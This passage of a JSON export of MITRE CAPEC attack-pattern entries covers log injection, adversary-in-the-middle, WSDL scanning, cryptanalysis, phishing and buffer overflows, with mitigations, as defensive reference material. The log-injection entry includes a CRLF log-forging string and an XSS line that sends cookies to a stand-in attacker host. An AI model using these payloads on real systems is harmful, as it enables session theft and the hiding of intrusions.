<stdlib.h>",{"style":"margin-left:10px;","class":"informative","div":["if (argc !=3){",{"style":"margin-left:10px;","div":["printf(\\"Usage: prog_name <string1> <string2>\\\\n\\");",{"style":"margin-left:10px;"}]}]}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"190"},{"CWE_ID":"128"},{"CWE_ID":"120"},{"CWE_ID":"122"},{"CWE_ID":"196"},{"CWE_ID":"680"},{"CWE_ID":"697"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"03","Entry_Name":"Integer Overflows"}},"References":{"Reference":[{"External_Reference_ID":"REF-131"},{"External_Reference_ID":"REF-547","Section":"Test Case ID 1511"},{"External_Reference_ID":"REF-548","Section":"Page 152, Figure 5-1"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations, References, Taxonomy_Mappings"}]}},"93":{"ID":"93","Name":"Log Injection-Tampering-Forging","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing them to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accountability, non-repudiation and incident forensics capability.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"268","Exclude_Related":{"Exclude_ID":"515"}},{"Nature":"CanPrecede","CAPEC_ID":"592"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine Application\'s Log File Format] The first step is exploratory meaning the attacker observes the system. The attacker looks for action and data that are likely to be logged. The attacker may be familiar with the log format of the system.","Technique":["Determine logging utility being used by application (e.g. log4j)","Gain access to application\'s source code to determine log file formats.","Install or obtain access to instance of application and observe its log file format."]},{"Step":"2","Phase":"Exploit","Description":"[Manipulate Log Files] The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted input that the target software will write to the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.","Technique":[{"p":["Use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry. For example:","may add the following forged entry into a log file:","Different applications may require different encodings of the carriage return and line feed characters."],"div":["\\"%0D%0A[Thu%20Nov%2012%2011:22]:Info:%20User%20admin%20logged%20in\\"",{"style":"margin-left:10px;","class":"attack"},"\\"[Thu Nov 12 12:11:22]:Info: User admin logged in\\"",{"style":"margin-left:10px;","class":"result"}]},{"p":["Insert a script into the log file such that if it is viewed using a web browser, the attacker will get a copy of the operator/administrator\'s cookie and will be able to gain access as that user. For example, a log file entry could contain","The script itself will be invisible to anybody viewing the logs in a web browser (unless they view the source for the page)."],"div":["<script>new Image().src=\\"http://xss.attacker.com/log_cookie?cookie=\\"+encodeURI(document.cookie);<\/script>",{"style":"margin-left:10px;","class":"attack"}]}]}]},"Prerequisites":{"Prerequisite":["The target host is logging the action and data of the user.","The target host insufficiently protects access to the logs or logging mechanisms."]},"Skills_Required":{"Skill":["This attack can be as simple as adding extra characters to the logged data (e.g. username). Adding entries is typically easier than removing entries.",{"Level":"Low"},"A more sophisticated attack can try to defeat the input validation mechanism.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Data"}},"Mitigations":{"Mitigation":["Carefully control access to physical log files.","Do not allow tainted data to be written in the log file without prior input validation. An allowlist may be used to properly validate the data.","Use synchronization to control the flow of execution.","Use static analysis tools to identify log forging vulnerabilities.","Avoid viewing logs with tools that may interpret control characters in the file, such as command-line shells."]},"Example_Instances":{"Example":["Dave Nielsen and Patrick Breitenbach PayPal Web Services (aka PHP Toolkit) 0.50, and possibly earlier versions, allows remote attackers to enter false payment entries into the log file via HTTP POST requests to ipn_success.php. See also: CVE-2006-0201",{"p":["If a user submits the string \\"twenty-one\\" for val, the following entry is logged:","However, if an attacker submits the string","the following entry is logged:","Clearly, attackers can use this same mechanism to insert arbitrary log entries."],"div":["INFO: Failed to parse val=twenty-one",{"style":"margin-left:10px;","class":"result"},"twenty-one%0a%0aINFO:+User+logged+out%3dbadguy",{"style":"margin-left:10px;","class":"attack"},"INFO: Failed to parse val=twenty-one",{"style":"margin-left:10px;","class":"result"}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"117"},{"CWE_ID":"75"},{"CWE_ID":"150"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1070","Entry_Name":"Indicator Removal on Host"}},"References":{"Reference":[{"External_Reference_ID":"REF-131"},{"External_Reference_ID":"REF-550"},{"External_Reference_ID":"REF-551","Section":"Log injection"},{"External_Reference_ID":"REF-552","Section":"Test Case ID 1579"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Examples-Instances, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"94":{"ID":"94","Name":"Adversary in the Middle (AiTM)","Abstraction":"Meta","Status":"Stable","Description":{"p":["An adversary targets the communication between two components (typically client and server), in order to alter or obtain data from transactions. A general approach entails the adversary placing themself within the communication channel between the two components. Whenever one component attempts to communicate with the other (data flow, authentication challenges, etc.), the data first flows through the adversary, who has the opportunity to observe or alter it, before being passed on to the intended recipient as if it was never observed. This interposition is transparent leaving the two compromised components unaware of the potential corruption or leakage of their communications. The potential for these attacks yields an implicit lack of trust in communication or identify between two components.","These attacks differ from Sniffing Attacks (CAPEC-157) since these attacks often modify the communications prior to delivering it to the intended recipient."]},"Alternate_Terms":{"Alternate_Term":[{"Term":"Man-in-the-Middle / MITM"},{"Term":"Person-in-the-Middle / PiTM"},{"Term":"Monkey-in-the-Middle"},{"Term":"Monster-in-the-Middle"},{"Term":"On-path Attacker"}]},"Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"CanPrecede","CAPEC_ID":"151"},{"Nature":"CanPrecede","CAPEC_ID":"668"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"The attacker probes to determine the nature and mechanism of communication between two components looking for opportunities to exploit."},{"Step":"2","Phase":"Experiment","Description":"The attacker inserts themself into the communication channel initially acting as a routing proxy between the two targeted components. The attacker may or may not have to use cryptography."},{"Step":"3","Phase":"Exploit","Description":"The attacker observes, filters, or alters passed data of its choosing to gain access to sensitive information or to manipulate the actions of the two target components for their own purposes."}]},"Prerequisites":{"Prerequisite":["There are two components communicating with each other.","An attacker is able to identify the nature and mechanism of communication between the two target components.","An attacker can eavesdrop on the communication between the target components.","Strong mutual authentication is not used between the two target components yielding opportunity for attacker interposition.","The communication occurs in clear (not encrypted) or with insufficient and spoofable encryption."]},"Skills_Required":{"Skill":["This attack can get sophisticated since the attack may use cryptography.",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Ensure Public Keys are signed by a Certificate Authority","Encrypt communications using cryptography (e.g., SSL/TLS)","Use Strong mutual authentication to always fully authenticate both ends of any communications channel.","Exchange public keys using a secure channel"]},"Example_Instances":{"Example":{"p":"In 2017, security researcher Jerry Decime discovered that Equifax mobile applications were not leveraging HTTPS in all areas. Although authentication was properly utilizing HTTPS, in addition to validating the root of trust of the server certificate, other areas of the application were using HTTP to communicate. Adversaries could then conduct MITM attacks on rogue WiFi or cellular networks and hijack the UX. This further allowed the adversaries to prompt users for sensitive data, which could then be obtained in the plaintext response. [REF-636]"}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"300"},{"CWE_ID":"290"},{"CWE_ID":"593"},{"CWE_ID":"287"},{"CWE_ID":"294"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1557","Entry_Name":"Man-in-the-Middle"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Man-in-the-middle attack"}]},"References":{"Reference":[{"External_Reference_ID":"REF-553"},{"External_Reference_ID":"REF-633"},{"External_Reference_ID":"REF-634"},{"External_Reference_ID":"REF-635"},{"External_Reference_ID":"REF-636"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Examples-Instances, Related_Vulnerabilities"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Example_Instances, Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction, Description, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Example_Instances, Execution_Flow, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated @Name, @Status, Alternate_Terms, Description, Example_Instances, Execution_Flow, Mitigations, References, Related_Attack_Patterns, Related_Weaknesses, Taxonomy_Mappings"}],"Previous_Entry_Name":["Man in the Middle Attack",{"Date":"2021-06-24"}]}},"95":{"ID":"95","Name":"WSDL Scanning","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets the WSDL interface made available by a web service. The attacker may scan the WSDL interface to reveal sensitive information about invocation patterns, underlying technology implementations and associated vulnerabilities. This type of probing is carried out to perform more serious attacks (e.g. parameter tampering, malicious content injection, command injection, etc.). WSDL files provide detailed information about the services ports and bindings available to consumers. For instance, the attacker can submit special characters or malicious content to the Web service and can cause a denial of service condition or illegal access to database records. In addition, the attacker may try to guess other private methods by using the information provided in the WSDL files.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"54"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Scan for WSDL Documents] The adversary scans for WSDL documents. The WDSL document written in XML is like a handbook on how to communicate with the web services provided by the target host. It provides an open view of the application (function details, purpose, functional break down, entry points, message types, etc.). This is very useful information for the adversary."},{"Step":"2","Phase":"Experiment","Description":"[Analyze WSDL files] An adversary will analyze the WSDL files and try to find potential weaknesses by sending messages matching the pattern described in the WSDL file. The adversary could run through all of the operations with different message request patterns until a breach is identified."},{"Step":"3","Phase":"Exploit","Description":"[Craft malicious content] Once an adversary finds a potential weakness, they can craft malicious content to be sent to the system. For instance the adversary may try to submit special characters and observe how the system reacts to an invalid request. The message sent by the adversary may not be XML validated and cause unexpected behavior."}]},"Prerequisites":{"Prerequisite":["A client program connecting to a web service can read the WSDL to determine what functions are available on the server.","The target host exposes vulnerable functions within its WSDL interface."]},"Skills_Required":{"Skill":["This attack can be as simple as reading WSDL and starting sending invalid request.",{"Level":"Low"},"This attack can be used to perform more sophisticated attacks (SQL injection, etc.)",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["It is important to protect WSDL file or provide limited access to it.","Review the functions exposed by the WSDL interface (especially if you have used a tool to generate it). Make sure that none of them is vulnerable to injection.","Ensure the WSDL does not expose functions and APIs that were not intended to be exposed.","Pay attention to the function naming convention (within the WSDL interface). Easy to guess function name may be an entry point for attack.","Validate the received messages against the WSDL Schema. Incomplete solution."]},"Example_Instances":{"Example":["A WSDL interface may expose a function vulnerable to SQL Injection.",{"p":["The Web Services Description Language (WSDL) allows a web service to advertise its capabilities by describing operations and parameters needed to access the service. As discussed in step 5 of this series, WSDL is often generated automatically, using utilities such as Java2WSDL, which takes a class or interface and builds a WSDL file in which interface methods are exposed as web services.","Because WSDL generation often is automated, enterprising adversaries can use WSDL to gain insight into the both public and private services. For example, an organization converting legacy application functionality to a web services framework may inadvertently pass interfaces not intended for public consumption to a WSDL generation tool. The result will be SOAP interfaces that give access to private methods.","Another, more subtle WSDL attack occurs when an enterprising attacker uses naming conventions to guess the names of unpublished methods that may be available on the server. For example, a service that offers a stock quote and trading service may publish query methods such as requestStockQuote in its WSDL. However, similar unpublished methods may be available on the server but not listed in the WSDL, such as executeStockQuote. A persistent adversary with time and a library of words and phrases can cycle thru common naming conventions (get, set, update, modify, and so on) to discover unpublished application programming interfaces that open doors into private data and functionality.","Source : \\"Seven Steps to XML Mastery, Step 7: Ensure XML Security\\", Frank Coyle. See reference section."]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"538"}},"References":{"Reference":[{"External_Reference_ID":"REF-554"},{"External_Reference_ID":"REF-555","Section":"Step 7: Ensure XML Security"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"96":{"ID":"96","Name":"Block Access to Libraries","Abstraction":"Detailed","Status":"Draft","Description":"An application typically makes calls to functions that are a part of libraries external to the application. These libraries may be part of the operating system or they may be third party libraries. It is possible that the application does not handle situations properly where access to these libraries has been blocked. Depending on the error handling within the application, blocked access to libraries may leave the system in an insecure state that could be leveraged by an attacker.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"603","Exclude_Related":{"Exclude_ID":"512"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"Determine what external libraries the application accesses."},{"Step":"2","Phase":"Experiment","Description":"Block access to the external libraries accessed by the application."},{"Step":"3","Phase":"Experiment","Description":"Monitor the behavior of the system to see if it goes into an insecure/inconsistent state."},{"Step":"4","Phase":"Experiment","Description":"If the system does go into an insecure/inconsistent state, leverage that to obtain information about the system functionality or data, elevate access control, etc. The rest of this attack will depend on the context and the desired goal."}]},"Prerequisites":{"Prerequisite":["An application requires access to external libraries.","An attacker has the privileges to block application access to external libraries."]},"Skills_Required":{"Skill":["Knowledge of how to block access to libraries, as well as knowledge of how to leverage the resulting state of the application based on the failed call.",{"Level":"Low"}]},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Alter Execution Logic"},{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":"Ensure that application handles situations where access to APIs in external libraries is not available securely. If the application cannot continue its execution safely it should fail in a consistent and secure fashion."},"Example_Instances":{"Example":"A web-based system uses a third party cryptographic random number generation library that derives entropy from machine\'s hardware. This library is used in generation of user session ids used by the application. If the library is inaccessible, the application instead uses a software based weak pseudo random number generation library. An attacker of the system blocks access of the application to the third party cryptographic random number generation library (by renaming it). The application in turn uses the weak pseudo random number generation library to generate session ids that are predictable. An attacker then leverages this weakness to guess a session id of another user to perform a horizontal elevation of privilege escalation and gain access to another user\'s account."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"589"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"97":{"ID":"97","Name":"Cryptanalysis","Abstraction":"Standard","Status":"Draft","Description":"Cryptanalysis is a process of finding weaknesses in cryptographic algorithms and using these weaknesses to decipher the ciphertext without knowing the secret key (instance deduction). Sometimes the weakness is not in the cryptographic algorithm itself, but rather in how it is applied that makes cryptanalysis successful. An attacker may have other goals as well, such as: Total Break (finding the secret key), Global Deduction (finding a functionally equivalent algorithm for encryption and decryption that does not require knowledge of the secret key), Information Deduction (gaining some information about plaintexts or ciphertexts that was not previously known) and Distinguishing Algorithm (the attacker has the ability to distinguish the output of the encryption (ciphertext) from a random permutation of bits).","Likelihood_Of_Attack":"Low","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"192"},{"Nature":"CanPrecede","CAPEC_ID":"20"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"An attacker discovers a weakness in the cryptographic algorithm or a weakness in how it was applied to a particular chunk of plaintext."},{"Step":"2","Phase":"Exploit","Description":"An attacker leverages the discovered weakness to decrypt, partially decrypt or infer some information about the contents of the encrypted message. All of that is done without knowing the secret key."}]},"Prerequisites":{"Prerequisite":["The target software utilizes some sort of cryptographic algorithm.","An underlying weaknesses exists either in the cryptographic algorithm used or in the way that it was applied to a particular chunk of plaintext.","The encryption algorithm is known to the attacker.","An attacker has access to the ciphertext."]},"Skills_Required":{"Skill":["Cryptanalysis generally requires a very significant level of understanding of mathematics and computation.",{"Level":"High"}]},"Resources_Required":{"Resource":"Computing resource requirements will vary based on the complexity of a given cryptanalysis technique. Access to the encryption/decryption routines of the algorithm is also required."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"In most cases, if cryptanalysis is successful at all, an adversary will not be able to decrypt the entire message, but instead will only be able to deduce some information about the plaintext. However, that may be sufficient for an adversary, depending on the context of the attack."}},"Mitigations":{"Mitigation":["Use proven cryptographic algorithms with recommended key sizes.",{"p":"Ensure that the algorithms are used properly. That means:","div":{"style":"margin-left:10px;","ul":{"li":["1. Not rolling out your own crypto; Use proven algorithms and implementations.","2. Choosing initialization vectors with sufficiently random numbers","3. Generating key material using good sources of randomness and avoiding known weak keys","4. Using proven protocols and their implementations.","5. Picking the most appropriate cryptographic algorithm for your usage context and data"]}}}]},"Example_Instances":{"Example":"A very easy to understand example is a cryptanalysis technique called frequency analysis that can be successfully applied to the very basic classic encryption algorithms that performed mono-alphabetic substitution replacing each letter in the plaintext with its predetermined mapping letter from the same alphabet. This was considered an improvement over a more basic technique that would simply shift all of the letters of the plaintext by some constant number of positions and replace the original letters with the new letter with the resultant alphabet position. While mono-alphabetic substitution ciphers are resilient to blind brute force, they can be broken easily with nothing more than a pen and paper. Frequency analysis uses the fact that natural language is not random and mono-alphabetic substitution does not hide the statistical properties of the natural language. So if the letter \\"E\\" in an English language occurs with a certain known frequency (about 12.7%), whatever \\"E\\" was substituted with to get to the ciphertext, will occur with the similar frequency. Having this frequency information allows the cryptanalyst to quickly determine the substitutions and decipher the ciphertext. Frequency analysis techniques are not applicable to modern ciphers as they are all resilient to it (unless this is a very bad case of a homegrown encryption algorithm). This example is inapplicable to modern cryptographic ciphers but is here to illustrate a rudimentary example of cryptanalysis."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"327"},{"CWE_ID":"1204"},{"CWE_ID":"1240"},{"CWE_ID":"1241"},{"CWE_ID":"1279"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Cryptanalysis"}},"References":{"Reference":{"External_Reference_ID":"REF-556","Section":"Cryptanalysis"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Description, Description Summary, Examples-Instances, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"98":{"ID":"98","Name":"Phishing","Abstraction":"Standard","Status":"Draft","Description":"Phishing is a social engineering technique where an attacker masquerades as a legitimate entity with which the victim might do business in order to prompt the user to reveal some confidential information (very frequently authentication credentials) that can later be used by an attacker. Phishing is essentially a form of information gathering or \\"fishing\\" for information.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"151","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"513"}]},{"Nature":"CanPrecede","CAPEC_ID":"89"},{"Nature":"CanPrecede","CAPEC_ID":"543"},{"Nature":"CanPrecede","CAPEC_ID":"611"},{"Nature":"CanPrecede","CAPEC_ID":"630"},{"Nature":"CanPrecede","CAPEC_ID":"631"},{"Nature":"CanPrecede","CAPEC_ID":"632"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Obtain domain name and certificate to spoof legitimate site] This optional step can be used to help the attacker impersonate the legitimate site more convincingly. The attacker can use homograph attacks to convince users that they are using the legitimate website. Note that this step is not required for phishing attacks, and many phishing attacks simply supply URLs containing an IP address and no SSL certificate.","Technique":["Optionally obtain a domain name that visually looks similar to the legitimate site\'s domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L)","Optionally obtain a legitimate SSL certificate for the new domain name."]},{"Step":"2","Phase":"Explore","Description":"[Explore legitimate website and create duplicate] An attacker creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the website that they are trying to impersonate. That website will typically have a login form for the victim to put in their authentication credentials. There can be different variations on a theme here.","Technique":["Use spidering software to get copy of web pages on legitimate site.","Manually save copies of required web pages from legitimate site.","Create new web pages that have the legitimate site\'s look and feel, but contain completely new content."]},{"Step":"3","Phase":"Exploit","Description":"[Convince user to enter sensitive information on attacker\'s site.] An attacker sends an e-mail to the victim that has some sort of a call to action to get the user to click on the link included in the e-mail (which takes the victim to attacker\'s website) and log in. The key is to get the victim to believe that the e-mail is coming from a legitimate entity with which the victim does business and that the website pointed to by the URL in the e-mail is the legitimate website. A call to action will usually need to sound legitimate and urgent enough to prompt action from the user.","Technique":["Send the user a message from a spoofed legitimate-looking e-mail address that asks the user to click on the included link.","Place phishing link in post to online forum."]},{"Step":"4","Phase":"Exploit","Description":"[Use stolen credentials to log into legitimate site] Once the attacker captures some sensitive information through phishing (login credentials, credit card information, etc.) the attacker can leverage this information. For instance, the attacker can use the victim\'s login credentials to log into their bank account and transfer money to an account of their choice.","Technique":"Log in to the legitimate site using another user\'s supplied credentials"}]},"Prerequisites":{"Prerequisite":["An attacker needs to have a way to initiate contact with the victim. Typically that will happen through e-mail.","An attacker needs to correctly guess the entity with which the victim does business and impersonate it. Most of the time phishers just use the most popular banks/services and send out their \\"hooks\\" to many potential victims.","An attacker needs to have a sufficiently compelling call to action to prompt the user to take action.","The replicated website needs to look extremely similar to the original website and the URL used to get to that website needs to look like the real URL of the said business entity."]},"Skills_Required":{"Skill":["Basic knowledge about websites: obtaining them, designing and implementing them, etc.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Some web development tools to put up a fake website."},"Indicators":{"Indicator":["You receive an e-mail from an entity that you are not even a customer of prompting you to log into your account.","You receive any e-mail that provides you with a link which takes you to a website on which you need to enter your log in information."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":"Do not follow any links that you receive within your e-mails and certainly do not input any login credentials on the page that they take you too. Instead, call your Bank, PayPal, eBay, etc., and inquire about the problem. A safe practice would also be to type the URL of your bank in the browser directly and only then log in. Also, never reply to any e-mails that ask you to provide sensitive information of any kind."},"Example_Instances":{"Example":["The target gets an official looking e-mail from their bank stating that their account has been temporarily locked due to suspected unauthorized activity and that they need to click on the link included in the e-mail to log in to their bank account in order to unlock it. The link in the e-mail looks very similar to that of their bank and once the link is clicked, the log in page is the exact replica. The target supplies their login credentials after which they are notified that their account has now been unlocked and that everything is fine. An attacker has just collected the target\'s online banking information which can now be used by the attacker to log into the target\'s bank account and transfer money to a bank account of the attackers\' choice.","An adversary may use BlueJacking, or Bluetooth Phishing to send unsolicited contact cards, messages, or pictures to nearby devices that are listening via Bluetooth. These messages may contain phishing content."]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1566","Entry_Name":"Phishing"}},"References":{"Reference":{"External_Reference_ID":"REF-656"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Example_Instances, Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Example_Instances, References"}]}},"100":{"ID":"100","Name":"Overflow Buffers","Abstraction":"Standard","Status":"Draft","Description":"Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an adversary. As a consequence, an adversary is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the adversaries\' choice.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"123"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target application] The adversary identifies a target application or program to perform the buffer overflow on. Adversaries often look for applications that accept user input and that perform manual memory management."},{"Step":"2","Phase":"Experiment","Description":"[Find injection vector] The adversary identifies an injection vector to deliver the excessive content to the targeted application\'s buffer.","Technique":"Provide large input to a program or application and observe the behavior. If there is a crash, this means that a buffer overflow attack is possible."},{"Step":"3","Phase":"Experiment","Description":"[Craft overflow content] The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary\'s choosing.","Technique":["Create malicious shellcode that will execute when the program execution is returned to it.","Use a NOP-sled in the overflow content to more easily \\"slide\\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the 